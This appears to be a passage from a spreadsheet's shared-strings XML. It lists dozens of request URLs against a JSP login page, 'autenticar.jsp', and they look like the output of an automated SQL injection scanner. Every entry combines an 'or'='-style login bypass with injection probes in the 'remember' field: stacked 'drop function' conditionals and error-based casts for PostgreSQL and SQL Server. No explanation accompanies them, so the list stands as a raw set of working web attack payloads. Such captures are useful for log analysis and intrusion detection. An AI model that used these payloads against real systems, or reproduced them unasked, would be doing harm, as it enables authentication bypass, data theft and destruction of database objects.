  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(2900=3713)select2900elsedropfunctionzvvl;--and((('otog'like'otog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(9157=8161)select9157elsedropfunctionhopv;--and'qoqr'like'qoqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(5592=5592)select5592elsedropfunctiontgls;--and'dmpx'like'dmpx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(1114=1980)select1114elsedropfunctionfiqy;--and'pfts'like'pfts&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(1898=1770)select1898elsedropfunctionbsss;--and("saep"="saep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(5592=5592)select5592elsedropfunctiontgls;--and("qkpy"="qkpy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(6138=56)select6138elsedropfunctionfdjo;--and("bgfo"="bgfo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(4386=5654)select4386elsedropfunctionskue;--and(("pfyb"="pfyb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(5592=5592)select5592elsedropfunctiontgls;--and(("pvkj"="pvkj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(6358=5653)select6358elsedropfunctionkjjd;--and(("mefs"="mefs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(7399=1708)select7399elsedropfunctionxghx;--and((("iuoh"="iuoh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(5592=5592)select5592elsedropfunctiontgls;--and((("htut"="htut&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(2515=3839)select2515elsedropfunctionvqlk;--and((("kzzd"="kzzd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(9988=4598)select9988elsedropfunctionlohq;--and"unos"="unos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(5592=5592)select5592elsedropfunctiontgls;--and"xlur"="xlur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(9320=9177)select9320elsedropfunctiongmma;--and"oiys"="oiys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(3749=8760)select3749elsedropfunctionxupy;--and("oajc"like"oajc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(5592=5592)select5592elsedropfunctiontgls;--and("mdsx"like"mdsx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if(4374=3169)select4374elsedropfunctionmarl;--and("pufb"like"pufb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(4885=4713)select4885elsedropfunctionbequ;--and(("zpsi"like"zpsi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(5592=5592)select5592elsedropfunctiontgls;--and(("pbqo"like"pbqo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if(4363=2994)select4363elsedropfunctionqwpn;--and(("zkhf"like"zkhf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(1375=8763)select1375elsedropfunctionhjpb;--and((("mlhs"like"mlhs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(5592=5592)select5592elsedropfunctiontgls;--and((("ezor"like"ezor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if(7644=2574)select7644elsedropfunctionkhlp;--and((("lcsp"like"lcsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(595=9742)select595elsedropfunctionsedk;--and"ulvp"like"ulvp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(5592=5592)select5592elsedropfunctiontgls;--and"hmfp"like"hmfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(8155=6836)select8155elsedropfunctionakok;--and"cjzb"like"cjzb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(6286=6286&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((838=838&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(((5719=5719&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('jqri'='jqri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('bxnf'='bxnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('sulf'='sulf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'djzb'='djzb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('cdxx'like'cdxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('kesl'like'kesl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('emyl'like'emyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'ykwd'like'ykwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("cyhj"="cyhj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("kbvk"="kbvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("xfij"="xfij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"qwwf"="qwwf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("ptgg"like"ptgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("rkny"like"rkny&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("lhpc"like"lhpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3041=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3041=3041)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"bjnt"like"bjnt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(7266=7266&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((9332=9332&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((6078=6078&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('paga'='paga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('zqfe'='zqfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('jfxo'='jfxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'zsso'='zsso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('xzpl'like'xzpl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('jlqh'like'jlqh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('rfrw'like'rfrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'whrg'like'whrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("bugq"="bugq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("qhif"="qhif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("kodf"="kodf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"rcce"="rcce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("fswn"like"fswn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("vecg"like"vecg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("ijxj"like"ijxj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2555=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2555=2555)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"nzfb"like"nzfb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(1025=1025&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((4797=4797&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((7469=7469&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('rsfg'='rsfg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('giaq'='giaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('mbek'='mbek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'rwtg'='rwtg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('ypzr'like'ypzr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('lxut'like'lxut&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('haix'like'haix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'xcwb'like'xcwb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("zuwm"="zuwm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("jjxq"="jjxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("curq"="curq&amp;modo=entrar</t>
